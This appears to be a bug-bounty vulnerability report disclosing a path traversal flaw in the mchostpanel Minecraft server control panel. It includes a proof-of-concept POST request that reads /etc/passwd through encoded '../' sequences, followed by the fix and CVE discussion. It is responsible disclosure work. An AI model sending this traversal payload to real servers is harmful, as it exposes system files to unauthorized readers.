Path Traversal in alanaktion/mchostpanel

Valid

Reported on

Sep 5th 2021

✍️ Description

A Path Traversal vulnerability was identified in Minecraft server control panel which allows an attacker to access arbitrary user resources.

🕵️‍♂️ Proof of Concept

POST /ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: curl/7.47.0
Accept: */*
Content-Length: 45
Content-Type: application/x-www-form-urlencoded

req=file_get&file=..%2F..%2F..%2Fetc%2Fpasswd

💥 Impact

This issue may lead to unauthorized access to local file (information) disclosure.

Occurrences

We have contacted a member of the alanaktion/mchostpanel team and are waiting to hear back 2 years ago
Alan Hardman validated this vulnerability 2 years ago
Dwi Siswanto has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alan Hardman marked this as fixed with commit 27d5a9 2 years ago
Alan Hardman has been awarded the fix bounty
This vulnerability will not receive a CVE
Dwi Siswanto
2 years ago

Researcher

Can we assign CVE for this, @admin?

Jamie Slome
2 years ago

Admin

Hello @dwisiswant0 - we just need to get confirmation from the maintainer before assigning a CVE, when our system does not automatically assign one.

@alanaktion - are you happy for us to assign a CVE against this report?

to join this conversation